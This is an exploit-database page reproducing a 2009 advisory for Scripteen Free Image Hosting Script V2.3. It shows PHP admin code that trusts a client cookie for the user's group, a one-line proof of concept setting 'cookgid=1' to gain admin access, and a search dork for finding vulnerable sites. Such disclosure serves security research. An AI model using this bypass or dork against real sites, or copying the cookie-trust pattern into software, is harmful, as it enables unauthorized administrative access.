header-logo
Suggest Exploit
vendor:
Free Image Hosting Script
by:
Qabandi
5.5
CVSS
MEDIUM
Insecure Cookie Handling
613
CWE
Product Name: Free Image Hosting Script
Affected Version From: Scripteen Free Image Hosting Script V2.3
Affected Version To: Scripteen Free Image Hosting Script V2.3
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:scripteen:free_image_hosting_script:2.3
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling

The Scripteen Free Image Hosting Script V2.3 is vulnerable to insecure cookie handling, which can allow an attacker to hijack user sessions and gain unauthorized access to the website. This vulnerability occurs when the application does not properly handle session cookies, allowing an attacker to intercept and modify them. This can lead to various security risks, such as session hijacking, identity theft, and unauthorized access to user accounts.

Mitigation:

To mitigate this vulnerability, it is recommended to implement secure cookie handling practices. This includes setting the 'secure' flag on session cookies, using the 'httponly' flag to prevent client-side scripts from accessing cookies, and implementing strong session management controls.
Source

Exploit-DB raw data:

                                            ||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ\__
                                        __/QQQ/````````````````\QQQ\___
                                      _/QQQQQ/                  \QQQQQQ\
                                     /QQQQ/``                    ```QQQQ\
                                    /QQQQ/                          \QQQQ\
                                   |QQQQ/    By  Qabandi             \QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
                                    \QQQQ\                      __  /QQQQ/
                                     \QQQQ\                    /QQ\_QQQQ/
                                      \QQQQ\                   \QQQQQQQ/
                                       \QQQQQ\                 /QQQQQ/_
                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                              ```````````````````     `````

=Vuln:		Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO:		http://www.scripteen.com/
=BUY:  		---
=Download:      http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK:		DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

none

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in ".\admin\header.php"

$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
	$userid = $_COOKIE['cookid'];
	$usergid = $_COOKIE['cookgid'];
}

// this is the scripts authentication code, pasted in all admin files.. fail.

if($usergid!="1")
{
	header("Location: logout.php");	exit;
}
---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set:

Cookie: cookgid=1

---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah

---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              \
|      ----------------------------------------------------------------------  |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR